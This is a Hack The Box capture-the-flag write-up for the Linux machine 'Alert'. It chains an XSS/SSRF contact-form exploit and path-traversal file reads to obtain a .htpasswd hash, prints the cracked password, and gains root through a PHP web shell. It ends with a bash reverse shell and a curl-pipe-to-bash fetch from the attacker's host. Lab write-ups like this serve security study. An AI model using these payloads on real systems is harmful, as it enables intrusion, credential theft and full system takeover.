> m4rt@CTF_ARCHIVE:~$

// ATTACHMENTS

Hack The Box / LINUX / 2024-11-30

Hack The Box — Alert (Linux)

Contact form SSRF/XSS chain to exfiltrate internal messages and LFI data, credential recovery from .htpasswd, SSH as albert, and root command execution through writable website-monitor config.

Target

  • IP: 10.129.231.188

Port Scan

sudo nmap -sC -sV 10.129.231.188 -p- -T5 -v

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://alert.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
12227/tcp filtered unknown
20856/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add alert.htb to /etc/hosts.

Go to http://alert.htb.

This is a PHP site.

It allows viewing Markdown files.

Contact Form Behavior and Initial Callback

Go to the Contact us page.

Fill the fields and intercept the request.

A request is made to /contact.php with two parameters:

  • email
  • message

Send the request to Repeater.

Start a Python HTTP server:

python3 -m http.server 80

Modify message with this payload:

http://10.10.16.21/a

Remember to URL-encode it.

In the Python server terminal, we receive a request coming from the target machine.

Endpoint Discovery

ffuf -u 'http://alert.htb/index.php?page=FUZZ' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -fw 126

contact                 [Status: 200, Size: 1000, Words: 191, Lines: 29, Duration: 143ms]
about                   [Status: 200, Size: 1046, Words: 187, Lines: 24, Duration: 56ms]
messages                [Status: 200, Size: 661, Words: 123, Lines: 25, Duration: 57ms]
donate                  [Status: 200, Size: 1116, Words: 292, Lines: 29, Duration: 50ms]
alert                   [Status: 200, Size: 966, Words: 201, Lines: 29, Duration: 56ms]

If we go to http://alert.htb/index.php?page=messages, we get an empty page.

However, we can make the admin visit that page and send the response to our server.

Stored XSS for Messages Exfiltration

Start listener:

nc -vlnp 80

Use payload file:

  • attachments/exp_1.html

Upload a Markdown file.

Intercept request with Burp and send it to Repeater.

We see a POST request to /visualizer.php.

Replace the uploaded markdown content with the content of attachments/exp_1.html.

In the response, copy the uploaded markdown link, for example:

http://alert.htb/visualizer.php?link_share=6745ecd1467b66.27402664.md

Go to the Repeater tab for /contact.php.

Modify message with the copied link and send.

In netcat terminal we obtain:

<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>

Use payload file:

  • attachments/exp_2.html

Repeat the previous operations with payload in attachments/exp_2.html.

We obtain:

<pre></pre>

The file is empty.

LFI via messages.php file Parameter

Go to the Repeater tab with the request to /visualizer.php.

Set payload:

fetch('http://alert.htb/messages.php?file=../../../../etc/passwd')

Repeat the previous steps.

We obtain /etc/passwd from the target machine.

We note users:

  • albert
  • david

Repeat steps with:

file=../../../../etc/apache2/sites-available/000-default.conf

We note:

    ServerName statistics.alert.htb
    DocumentRoot /var/www/statistics.alert.htb
    AuthUserFile /var/www/statistics.alert.htb/.htpasswd

Repeat steps with:

file=../../../../var/www/statistics.alert.htb/.htpasswd

We obtain:

<pre>albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
</pre>

Put the hash in a file hash.

hashcat -a 0 ./hash ./rockyou.txt

Recovered password:

  • manchesterunited

SSH Access and Local Privilege Escalation

ssh albert@alert.htb

Use the recovered password.

ps aux

We notice:

/usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor

ss -ltpn

Port 8080 is open on localhost.

ssh albert@alert.htb -NL 5555:localhost:8080

Go to:

http://localhost:5555/

It seems we cannot exploit anything directly.

Back to shell as albert:

id

We are in group management.

Inside /opt/website-monitor, users in group management can write files in config.

Go to /opt/website-monitor/config and run:

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Go to:

http://localhost:5555/config/shell.php?cmd=id

We obtain:

uid=0(root) gid=0(root) groups=0(root)

We now have RCE and can get a reverse shell.

Create file rev with content:

bash -i >& /dev/tcp/10.10.16.21/4444 0>&1

Start netcat and Python HTTP server:

nc -vlnp 4444
python3 -m http.server 80

Go to:

http://localhost:5555/config/shell.php?cmd=curl http://10.10.16.21/rev | bash

We obtain a reverse shell as root.